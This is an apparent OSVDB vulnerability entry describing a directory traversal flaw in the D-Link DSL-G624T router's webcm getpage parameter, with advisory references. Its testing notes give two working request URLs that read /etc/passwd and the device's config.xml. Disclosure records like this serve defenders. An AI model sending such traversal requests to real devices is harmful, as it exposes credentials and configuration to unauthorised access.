D-Link DSL-G624T cgi-bin/webcm getpage Variable Traversal Arbitrary File Access

2006-10-23T10:48:48
ID OSVDB:30044
Type osvdb
Reporter OSVDB
Modified 2006-10-23T10:48:48

Description

Manual Testing Notes

http://[target]/cgi-bin/webcm?getpage=/./././././././etc/passwd http://[target]/cgi-bin/webcm?getpage=/./././././././etc/config.xml

References:

Secunia Advisory ID:22524 Related OSVDB ID: 30045 Other Advisory URL: http://www.eazel.es/advisory005-D-Link-DSL-G624T-directoy-transversal-xss-cross-site-scripting-directory-listing-vulnerabilities.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0056.html CVE-2006-5536